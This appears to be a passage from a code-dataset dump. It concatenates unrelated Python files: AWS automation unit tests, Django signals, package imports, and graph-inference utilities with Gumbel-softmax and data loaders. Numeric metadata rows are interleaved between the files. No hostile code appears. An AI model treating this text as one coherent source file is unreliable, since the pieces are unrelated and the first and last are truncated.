aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME)
user_data = aws.create_userdata(hostclass="mhcunittest", owner="unittestuser")
self.assertEqual(user_data["eip"], eip)
@patch_disco_aws
def test_create_userdata_with_zookeeper(self, **kwargs):
"""
create_userdata sets 'zookeepers' key
"""
config_dict = get_default_config_dict()
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME)
user_data = aws.create_userdata(hostclass="mhcunittest", owner="unittestuser")
self.assertEqual(user_data["zookeepers"], "[\\\"mhczookeeper-{}.example.com:2181\\\"]".format(
aws.vpc.environment_name))
@patch_disco_aws
def test_create_userdata_with_spotinst(self, **kwargs):
"""
        create_userdata sets the 'is_spotinst' key to '1' when using spotinst
"""
config_dict = get_default_config_dict()
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME)
user_data = aws.create_userdata(hostclass="mhcunittest", owner="unittestuser", is_spotinst=True)
self.assertEqual(user_data["is_spotinst"], "1")
@patch_disco_aws
def test_create_userdata_without_spotinst(self, **kwargs):
"""
        create_userdata sets the 'is_spotinst' key to '0' when not using spotinst
"""
config_dict = get_default_config_dict()
aws = DiscoAWS(config=get_mock_config(config_dict), environment_name=TEST_ENV_NAME)
user_data = aws.create_userdata(hostclass="mhcunittest", owner="unittestuser", is_spotinst=False)
self.assertEqual(user_data["is_spotinst"], "0")
@patch_disco_aws
def test_smoketest_all_good(self, mock_config, **kwargs):
        '''smoketest_once returns True if the instance is tagged as smoketested'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
self.instance.tags.get = MagicMock(return_value="100")
self.assertTrue(aws.smoketest_once(self.instance))
@patch_disco_aws
def test_smoketest_once_is_terminated(self, mock_config, **kwargs):
'''smoketest_once raises SmokeTestError if instance has terminated'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
with patch("disco_aws_automation.DiscoAWS.is_terminal_state", return_value=True):
self.assertRaises(SmokeTestError, aws.smoketest_once, self.instance)
@patch_disco_aws
def test_smoketest_once_no_instance(self, mock_config, **kwargs):
        '''smoketest_once converts an instance-not-found EC2 error into TimeoutError'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
self.instance.update = MagicMock(side_effect=EC2ResponseError(
400, "Bad Request",
body={
"RequestID": "df218052-63f2-4a11-820f-542d97d078bd",
"Error": {"Code": "InvalidInstanceID.NotFound", "Message": "test"}}))
self.assertRaises(TimeoutError, aws.smoketest_once, self.instance)
@patch_disco_aws
def test_smoketest_once_passes_exception(self, mock_config, **kwargs):
        '''smoketest_once propagates unrelated EC2ResponseErrors'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
self.instance.update = MagicMock(side_effect=EC2ResponseError(
400, "Bad Request",
body={
"RequestID": "df218052-63f2-4a11-820f-542d97d078bd",
"Error": {"Code": "Throttled", "Message": "test"}}))
self.assertRaises(EC2ResponseError, aws.smoketest_once, self.instance)
@patch_disco_aws
def test_smoketest_not_tagged(self, mock_config, **kwargs):
'''smoketest_once raises TimeoutError if instance is not tagged as smoketested'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
self.instance.tags.get = MagicMock(return_value=None)
self.assertRaises(TimeoutError, aws.smoketest_once, self.instance)
@patch_disco_aws
def test_is_terminal_state_updates(self, mock_config, **kwargs):
'''is_terminal_state calls instance update'''
DiscoAWS.is_terminal_state(self.instance)
self.assertEqual(self.instance.update.call_count, 1)
@patch_disco_aws
    def test_is_terminal_state_terminated(self, mock_config, **kwargs):
'''is_terminal_state returns true if instance has terminated or failed to start'''
self.instance.state = "terminated"
self.assertTrue(DiscoAWS.is_terminal_state(self.instance))
self.instance.state = "failed"
self.assertTrue(DiscoAWS.is_terminal_state(self.instance))
@patch_disco_aws
def test_is_terminal_state_running(self, mock_config, **kwargs):
'''is_terminal_state returns false for running instance'''
self.assertFalse(DiscoAWS.is_terminal_state(self.instance))
@patch_disco_aws
def test_is_running_updates(self, mock_config, **kwargs):
'''is_running calls instance update'''
DiscoAWS.is_running(self.instance)
self.assertEqual(self.instance.update.call_count, 1)
@patch_disco_aws
    def test_is_running_terminated(self, mock_config, **kwargs):
'''is_running returns false if instance has terminated'''
self.instance.state = "terminated"
self.assertFalse(DiscoAWS.is_running(self.instance))
@patch_disco_aws
def test_is_running_running(self, mock_config, **kwargs):
'''is_running returns true for running instance'''
self.assertTrue(DiscoAWS.is_running(self.instance))
@patch_disco_aws
def test_instances_from_amis(self, mock_config, **kwargs):
        '''test getting instances by AMI id'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instance = create_autospec(boto.ec2.instance.Instance)
instance.id = "i-123123aa"
instances = [instance]
aws.instances = MagicMock(return_value=instances)
self.assertEqual(aws.instances_from_amis('ami-12345678'), instances)
aws.instances.assert_called_with(filters={"image_id": 'ami-12345678'}, instance_ids=None)
@patch_disco_aws
def test_instances_from_amis_with_group_name(self, mock_config, **kwargs):
        '''test getting instances by AMI id within a specified group name'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instance = create_autospec(boto.ec2.instance.Instance)
instance.id = "i-123123aa"
instances = [instance]
aws.instances_from_asgs = MagicMock(return_value=instances)
aws.instances = MagicMock(return_value=instances)
self.assertEqual(aws.instances_from_amis('ami-12345678', group_name='test_group'), instances)
aws.instances_from_asgs.assert_called_with(['test_group'])
@patch_disco_aws
def test_instances_from_amis_with_launch_date(self, mock_config, **kwargs):
        '''test getting instances by AMI id that launched after a specified datetime'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
now = datetime.utcnow()
instance1 = create_autospec(boto.ec2.instance.Instance)
instance1.id = "i-123123aa"
instance1.launch_time = str(now + timedelta(minutes=10))
instance2 = create_autospec(boto.ec2.instance.Instance)
instance2.id = "i-123123ff"
instance2.launch_time = str(now - timedelta(days=1))
instances = [instance1, instance2]
aws.instances = MagicMock(return_value=instances)
self.assertEqual(aws.instances_from_amis('ami-12345678', launch_time=now),
[instance1])
aws.instances.assert_called_with(filters={"image_id": 'ami-12345678'}, instance_ids=None)
@patch_disco_aws
def test_wait_for_autoscaling_using_amiid(self, mock_config, **kwargs):
'''test wait for autoscaling using the ami id to identify the instances'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instances = [{"InstanceId": "i-123123aa"}]
aws.instances_from_amis = MagicMock(return_value=instances)
aws.wait_for_autoscaling('ami-12345678', 1)
aws.instances_from_amis.assert_called_with(['ami-12345678'], group_name=None, launch_time=None)
@patch_disco_aws
def test_wait_for_autoscaling_using_gp_name(self, mock_config, **kwargs):
'''test wait for autoscaling using the group name to identify the instances'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instances = [{"InstanceId": "i-123123aa"}]
aws.instances_from_amis = MagicMock(return_value=instances)
aws.wait_for_autoscaling('ami-12345678', 1, group_name='test_group')
aws.instances_from_amis.assert_called_with(['ami-12345678'], group_name='test_group',
launch_time=None)
@patch_disco_aws
def test_wait_for_autoscaling_using_time(self, mock_config, **kwargs):
'''test wait for autoscaling using the ami id to identify the instances and the launch time'''
aws = DiscoAWS(config=mock_config, environment_name=TEST_ENV_NAME)
instances = [{"InstanceId": "i-123123aa"}]
yesterday = datetime.utcnow() - timedelta(days=1)
aws.instances_from_amis = MagicMock(return_value=instances)
aws.wait_for_autoscaling('ami-12345678', 1, launch_time=yesterday)
aws.instances_from_amis.assert_called_with(['ami-12345678'], group_name=None,
launch_time=yesterday)
| 48.105208 | 108 | 0.615275 | 5,090 | 46,181 | 5.255206 | 0.068959 | 0.023627 | 0.03645 | 0.023926 | 0.877902 | 0.858312 | 0.829751 | 0.812853 | 0.788403 | 0.775207 | 0 | 0.023704 | 0.280137 | 46,181 | 959 | 109 | 48.15537 | 0.780923 | 0.067474 | 0 | 0.667939 | 0 | 0 | 0.164189 | 0.069486 | 0 | 0 | 0 | 0 | 0.115776 | 1 | 0.05598 | false | 0.001272 | 0.015267 | 0 | 0.076336 | 0.002545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6ee538e7dbc78b6955bfb070afda32b5d9fe25c | 37 | py | Python | ipmi/__init__.py | davidc0le/ipmitool | 830081623c0ec75d560123a559f0bb201f26cde6 | [
"Apache-2.0"
] | null | null | null | ipmi/__init__.py | davidc0le/ipmitool | 830081623c0ec75d560123a559f0bb201f26cde6 | [
"Apache-2.0"
] | null | null | null | ipmi/__init__.py | davidc0le/ipmitool | 830081623c0ec75d560123a559f0bb201f26cde6 | [
"Apache-2.0"
] | null | null | null | from ipmi import ipmitool, IPMIError
| 18.5 | 36 | 0.837838 | 5 | 37 | 6.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135135 | 37 | 1 | 37 | 37 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc37dc26211c884968c689db09cb24a9bead1a8e | 577 | py | Python | data/test/python/fc37dc26211c884968c689db09cb24a9bead1a8esignals.py | harshp8l/deep-learning-lang-detection | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | [
"MIT"
] | 84 | 2017-10-25T15:49:21.000Z | 2021-11-28T21:25:54.000Z | data/test/python/fc37dc26211c884968c689db09cb24a9bead1a8esignals.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 5 | 2018-03-29T11:50:46.000Z | 2021-04-26T13:33:18.000Z | data/test/python/fc37dc26211c884968c689db09cb24a9bead1a8esignals.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 24 | 2017-11-22T08:31:00.000Z | 2022-03-27T01:22:31.000Z | import django.dispatch
# files
file_edit_start = django.dispatch.Signal(providing_args=["repo", "file_path", "url"])
file_edit_finish = django.dispatch.Signal(providing_args=["repo", "file_path", "url"])
file_created = django.dispatch.Signal(providing_args=["repo", "file_path", "url"])
file_removed = django.dispatch.Signal(providing_args=["repo", "file_path", "url"])
# git
commit = django.dispatch.Signal(providing_args=["repo", "message"])
push = django.dispatch.Signal(providing_args=["repo", "message"])
pull = django.dispatch.Signal(providing_args=["repo", "message"]) | 48.083333 | 86 | 0.7487 | 75 | 577 | 5.533333 | 0.28 | 0.26988 | 0.337349 | 0.489157 | 0.809639 | 0.809639 | 0.809639 | 0.491566 | 0.491566 | 0.375904 | 0 | 0 | 0.067591 | 577 | 12 | 87 | 48.083333 | 0.771375 | 0.015598 | 0 | 0 | 0 | 0 | 0.171378 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc3f5b758508e4ea62d4b3be03a2c65a5bccf93f | 26 | py | Python | app/images/__init__.py | michaelscales88/flask_photo | bf3d2622cadd010dc8eb522610a5130bf4b9be98 | [
"MIT"
] | null | null | null | app/images/__init__.py | michaelscales88/flask_photo | bf3d2622cadd010dc8eb522610a5130bf4b9be98 | [
"MIT"
] | null | null | null | app/images/__init__.py | michaelscales88/flask_photo | bf3d2622cadd010dc8eb522610a5130bf4b9be98 | [
"MIT"
] | null | null | null | from .models import Image
| 13 | 25 | 0.807692 | 4 | 26 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 1 | 26 | 26 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fca25c1e191510522ef4a849fda1f77b34f7fa8d | 80 | py | Python | few_shot_learning/data/__init__.py | summelon/NASA_Hackathon2020_Team10 | a7d3c3b3a1c1c217090111cfdf2174c755e95780 | [
"MIT"
] | 3 | 2020-10-04T09:00:01.000Z | 2021-07-06T02:36:55.000Z | few_shot_learning/data/__init__.py | adkevin3307/NASA_Hackathon2020_Team10 | a7d3c3b3a1c1c217090111cfdf2174c755e95780 | [
"MIT"
] | null | null | null | few_shot_learning/data/__init__.py | adkevin3307/NASA_Hackathon2020_Team10 | a7d3c3b3a1c1c217090111cfdf2174c755e95780 | [
"MIT"
] | 1 | 2020-10-05T15:06:30.000Z | 2020-10-05T15:06:30.000Z | from . import datamgr
from . import dataset
from . import additional_transforms
| 20 | 35 | 0.8125 | 10 | 80 | 6.4 | 0.6 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 80 | 3 | 36 | 26.666667 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5d76c0776d99db82da2575e147b348a3fa19c458 | 24 | py | Python | contrib/diggext/drivers/devices/appliance/__init__.py | thekad/clusto | c141ea3ef4931c6a21fdf42845c6e9de5ee08caa | [
"BSD-3-Clause"
] | 216 | 2015-01-10T17:03:25.000Z | 2022-03-24T07:23:41.000Z | contrib/diggext/drivers/devices/appliance/__init__.py | thekad/clusto | c141ea3ef4931c6a21fdf42845c6e9de5ee08caa | [
"BSD-3-Clause"
] | 23 | 2015-01-08T16:51:22.000Z | 2021-03-13T12:56:04.000Z | contrib/diggext/drivers/devices/appliance/__init__.py | thekad/clusto | c141ea3ef4931c6a21fdf42845c6e9de5ee08caa | [
"BSD-3-Clause"
] | 49 | 2015-01-08T00:13:17.000Z | 2021-09-22T02:01:20.000Z | from netscaler import *
| 12 | 23 | 0.791667 | 3 | 24 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 24 | 1 | 24 | 24 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5dabf911a62060d60b0502816b1afce50085893a | 121 | py | Python | bcpy/processing/__init__.py | bneurd/bcpy | f52b64d3206c38f3131e91b4067a35765991891e | [
"MIT"
] | 2 | 2019-05-08T17:35:55.000Z | 2020-03-06T18:23:40.000Z | bcpy/processing/__init__.py | igornfaustino/bcpy | f52b64d3206c38f3131e91b4067a35765991891e | [
"MIT"
] | 17 | 2019-07-17T01:36:15.000Z | 2020-05-02T13:22:27.000Z | bcpy/processing/__init__.py | bneurd/bcpy | f52b64d3206c38f3131e91b4067a35765991891e | [
"MIT"
] | 1 | 2019-05-08T17:38:35.000Z | 2019-05-08T17:38:35.000Z | from .processing import bandfilter, notch, drop_channels, car
__all__ = ['bandfilter', 'notch', 'drop_channels', 'car']
| 30.25 | 61 | 0.735537 | 14 | 121 | 5.928571 | 0.642857 | 0.361446 | 0.457831 | 0.650602 | 0.722892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115702 | 121 | 3 | 62 | 40.333333 | 0.775701 | 0 | 0 | 0 | 0 | 0 | 0.256198 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5ded183750a547cb77eb404a5b38f2df70661cfa | 127,223 | py | Python | utils.py | vassilis-karavias/fNRI-mastersigma | d3f4fecf9d28a9bc6e6150994824ca7674006ed3 | [
"MIT"
] | null | null | null | utils.py | vassilis-karavias/fNRI-mastersigma | d3f4fecf9d28a9bc6e6150994824ca7674006ed3 | [
"MIT"
] | null | null | null | utils.py | vassilis-karavias/fNRI-mastersigma | d3f4fecf9d28a9bc6e6150994824ca7674006ed3 | [
"MIT"
] | null | null | null | """
This code is based on https://github.com/ekwebb/fNRI which in turn is based on https://github.com/ethanfetaya/NRI
(MIT licence)
"""
import numpy as np
import torch
from torch.utils.data.dataset import TensorDataset
from torch.utils.data import DataLoader
import torch.nn.functional as F
from torch.autograd import Variable
from itertools import permutations, chain
from math import factorial
import time
from os import path
def my_softmax(input, axis=1):
trans_input = input.transpose(axis, 0).contiguous()
soft_max_1d = F.softmax(trans_input, dim=0) # added dim=0 as implicit choice is deprecated, dim 0 is edgetype due to transpose
return soft_max_1d.transpose(axis, 0)
def binary_concrete(logits, tau=1, hard=False, eps=1e-10):
y_soft = binary_concrete_sample(logits, tau=tau, eps=eps)
if hard:
y_hard = (y_soft > 0.5).float()
y = Variable(y_hard.data - y_soft.data) + y_soft
else:
y = y_soft
return y
def binary_concrete_sample(logits, tau=1, eps=1e-10):
logistic_noise = sample_logistic(logits.size(), eps=eps)
if logits.is_cuda:
logistic_noise = logistic_noise.cuda()
y = logits + Variable(logistic_noise)
return F.sigmoid(y / tau)
def sample_logistic(shape, eps=1e-10):
uniform = torch.rand(shape).float()
return torch.log(uniform + eps) - torch.log(1 - uniform + eps)
def sample_gumbel(shape, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from Gumbel(0, 1)
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
U = torch.rand(shape).float()
return - torch.log(eps - torch.log(U + eps))
def gumbel_softmax_sample(logits, tau=1, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Draw a sample from the Gumbel-Softmax distribution
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb
(MIT license)
"""
gumbel_noise = sample_gumbel(logits.size(), eps=eps)
if logits.is_cuda:
gumbel_noise = gumbel_noise.cuda()
y = logits + Variable(gumbel_noise)
return my_softmax(y / tau, axis=-1)
def gumbel_softmax(logits, tau=1, hard=False, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
tau: non-negative scalar temperature
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
be a probability distribution that sums to 1 across classes
Constraints:
- this implementation only works on batch_size x num_features tensor for now
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
y_soft = gumbel_softmax_sample(logits, tau=tau, eps=eps)
if hard:
shape = logits.size()
_, k = y_soft.data.max(-1)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
y_hard = torch.zeros(*shape)
if y_soft.is_cuda:
y_hard = y_hard.cuda()
y_hard = y_hard.zero_().scatter_(-1, k.view(shape[:-1] + (1,)), 1.0)
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
y = Variable(y_hard - y_soft.data) + y_soft
else:
y = y_soft
return y
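# Illustrative usage sketch (added for clarity, not part of the original
# module): with hard=True the forward sample is one-hot while the gradient
# follows the soft sample (straight-through estimator). Shapes are arbitrary.
def _demo_gumbel_softmax():
    logits = Variable(torch.randn(32, 4), requires_grad=True)
    y = gumbel_softmax(logits, tau=0.5, hard=True)
    assert ((y.max(-1)[0] - 1).abs() < 1e-5).all()  # rows are (numerically) one-hot
    y.sum().backward()                              # gradients still reach the logits
    assert logits.grad is not None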
def my_sigmoid(logits, hard=True, sharpness=1.0):
edges_soft = 1/(1+torch.exp(-sharpness*logits))
if hard:
edges_hard = torch.round(edges_soft)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
if edges_soft.is_cuda:
edges_hard = edges_hard.cuda()
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
edges = Variable(edges_hard - edges_soft.data) + edges_soft
else:
edges = edges_soft
return edges
def binary_accuracy(output, labels):
preds = output > 0.5
correct = preds.type_as(labels).eq(labels).double()
correct = correct.sum()
return correct / len(labels)
def edge_type_encode(edges):  # this is used to give each 'interaction strength' a unique integer 0, 1, 2, ...
unique = np.unique(edges)
encode = np.zeros(edges.shape)
for i in range(unique.shape[0]):
encode += np.where( edges == unique[i], i, 0)
return encode
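# Worked example (added for illustration): raw interaction strengths such as
# 0.0 / 0.5 / 1.0 are mapped to consecutive integer labels 0 / 1 / 2.
def _demo_edge_type_encode():
    edges = np.array([[0.0, 0.5], [1.0, 0.5]])
    assert (edge_type_encode(edges) == np.array([[0., 1.], [2., 1.]])).all()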
def loader_edges_encode(edges, num_atoms):
edges = np.reshape(edges, [edges.shape[0], edges.shape[1], num_atoms ** 2])
edges = np.array(edge_type_encode(edges), dtype=np.int64)
off_diag_idx = np.ravel_multi_index(
np.where(np.ones((num_atoms, num_atoms)) - np.eye(num_atoms)),
[num_atoms, num_atoms])
edges = edges[:,:, off_diag_idx]
return edges
def loader_combine_edges(edges):
edge_types_list = [ int(np.max(edges[:,i,:]))+1 for i in range(edges.shape[1]) ]
assert( edge_types_list == sorted(edge_types_list)[::-1] )
encoded_target = np.zeros( edges[:,0,:].shape )
base = 1
for i in reversed(range(edges.shape[1])):
encoded_target += base*edges[:,i,:]
base *= edge_types_list[i]
return encoded_target.astype('int')
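# Worked example (added for illustration): two edge-type layers with 3 and 2
# types respectively combine into a single label in [0, 6) via a mixed-radix
# code, the last layer being the least significant digit, i.e.
# combined = 2 * layer0 + 1 * layer1.
def _demo_loader_combine_edges():
    edges = np.array([[[2, 0, 1],    # layer 0: 3 edge types
                       [1, 1, 0]]])  # layer 1: 2 edge types
    assert (loader_combine_edges(edges) == np.array([[5, 1, 2]])).all()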
def load_data_NRI(batch_size=1, sim_folder='', shuffle=True, data_folder='data'):
# the edges numpy arrays below are [ num_sims, N, N ]
loc_train = np.load(path.join(data_folder,sim_folder,'loc_train.npy'))
vel_train = np.load(path.join(data_folder,sim_folder,'vel_train.npy'))
edges_train = np.load(path.join(data_folder,sim_folder,'edges_train.npy'))
loc_valid = np.load(path.join(data_folder,sim_folder,'loc_valid.npy'))
vel_valid = np.load(path.join(data_folder,sim_folder,'vel_valid.npy'))
edges_valid = np.load(path.join(data_folder,sim_folder,'edges_valid.npy'))
loc_test = np.load(path.join(data_folder,sim_folder,'loc_test.npy'))
vel_test = np.load(path.join(data_folder,sim_folder,'vel_test.npy'))
edges_test = np.load(path.join(data_folder,sim_folder,'edges_test.npy'))
# [num_samples, num_timesteps, num_dims, num_atoms]
num_atoms = loc_train.shape[3]
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
loc_train = (loc_train - loc_min) * 2 / (loc_max - loc_min) - 1
vel_train = (vel_train - vel_min) * 2 / (vel_max - vel_min) - 1
loc_valid = (loc_valid - loc_min) * 2 / (loc_max - loc_min) - 1
vel_valid = (vel_valid - vel_min) * 2 / (vel_max - vel_min) - 1
loc_test = (loc_test - loc_min) * 2 / (loc_max - loc_min) - 1
vel_test = (vel_test - vel_min) * 2 / (vel_max - vel_min) - 1
# Reshape to: [num_sims, num_atoms, num_timesteps, num_dims]
loc_train = np.transpose(loc_train, [0, 3, 1, 2])
vel_train = np.transpose(vel_train, [0, 3, 1, 2])
feat_train = np.concatenate([loc_train, vel_train], axis=3)
loc_valid = np.transpose(loc_valid, [0, 3, 1, 2])
vel_valid = np.transpose(vel_valid, [0, 3, 1, 2])
feat_valid = np.concatenate([loc_valid, vel_valid], axis=3)
loc_test = np.transpose(loc_test, [0, 3, 1, 2])
vel_test = np.transpose(vel_test, [0, 3, 1, 2])
feat_test = np.concatenate([loc_test, vel_test], axis=3)
edges_train = loader_edges_encode(edges_train, num_atoms)
edges_valid = loader_edges_encode(edges_valid, num_atoms)
edges_test = loader_edges_encode(edges_test, num_atoms)
edges_train = loader_combine_edges(edges_train)
edges_valid = loader_combine_edges(edges_valid)
edges_test = loader_combine_edges(edges_test)
feat_train = torch.FloatTensor(feat_train)
edges_train = torch.LongTensor(edges_train)
feat_valid = torch.FloatTensor(feat_valid)
edges_valid = torch.LongTensor(edges_valid)
feat_test = torch.FloatTensor(feat_test)
edges_test = torch.LongTensor(edges_test)
train_data = TensorDataset(feat_train, edges_train)
valid_data = TensorDataset(feat_valid, edges_valid)
test_data = TensorDataset(feat_test, edges_test)
train_data_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)
valid_data_loader = DataLoader(valid_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
return train_data_loader, valid_data_loader, test_data_loader, loc_max, loc_min, vel_max, vel_min
def load_data_fNRI(batch_size=1, sim_folder='', shuffle=True, data_folder='data'):
# the edges numpy arrays below are [ num_sims, N, N ]
loc_train = np.load(path.join(data_folder,sim_folder,'loc_train.npy'))
vel_train = np.load(path.join(data_folder,sim_folder,'vel_train.npy'))
edges_train = np.load(path.join(data_folder,sim_folder,'edges_train.npy'))
loc_valid = np.load(path.join(data_folder,sim_folder,'loc_valid.npy'))
vel_valid = np.load(path.join(data_folder,sim_folder,'vel_valid.npy'))
edges_valid = np.load(path.join(data_folder,sim_folder,'edges_valid.npy'))
loc_test = np.load(path.join(data_folder,sim_folder,'loc_test.npy'))
vel_test = np.load(path.join(data_folder,sim_folder,'vel_test.npy'))
edges_test = np.load(path.join(data_folder,sim_folder,'edges_test.npy'))
# [num_samples, num_timesteps, num_dims, num_atoms]
num_atoms = loc_train.shape[3]
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
loc_train = (loc_train - loc_min) * 2 / (loc_max - loc_min) - 1
vel_train = (vel_train - vel_min) * 2 / (vel_max - vel_min) - 1
loc_valid = (loc_valid - loc_min) * 2 / (loc_max - loc_min) - 1
vel_valid = (vel_valid - vel_min) * 2 / (vel_max - vel_min) - 1
loc_test = (loc_test - loc_min) * 2 / (loc_max - loc_min) - 1
vel_test = (vel_test - vel_min) * 2 / (vel_max - vel_min) - 1
# Reshape to: [num_sims, num_atoms, num_timesteps, num_dims]
loc_train = np.transpose(loc_train, [0, 3, 1, 2])
vel_train = np.transpose(vel_train, [0, 3, 1, 2])
feat_train = np.concatenate([loc_train, vel_train], axis=3)
loc_valid = np.transpose(loc_valid, [0, 3, 1, 2])
vel_valid = np.transpose(vel_valid, [0, 3, 1, 2])
feat_valid = np.concatenate([loc_valid, vel_valid], axis=3)
loc_test = np.transpose(loc_test, [0, 3, 1, 2])
vel_test = np.transpose(vel_test, [0, 3, 1, 2])
feat_test = np.concatenate([loc_test, vel_test], axis=3)
edges_train = loader_edges_encode( edges_train, num_atoms )
edges_valid = loader_edges_encode( edges_valid, num_atoms )
edges_test = loader_edges_encode( edges_test, num_atoms )
edges_train = torch.LongTensor(edges_train)
edges_valid = torch.LongTensor(edges_valid)
edges_test = torch.LongTensor(edges_test)
feat_train = torch.FloatTensor(feat_train)
feat_valid = torch.FloatTensor(feat_valid)
feat_test = torch.FloatTensor(feat_test)
train_data = TensorDataset(feat_train, edges_train)
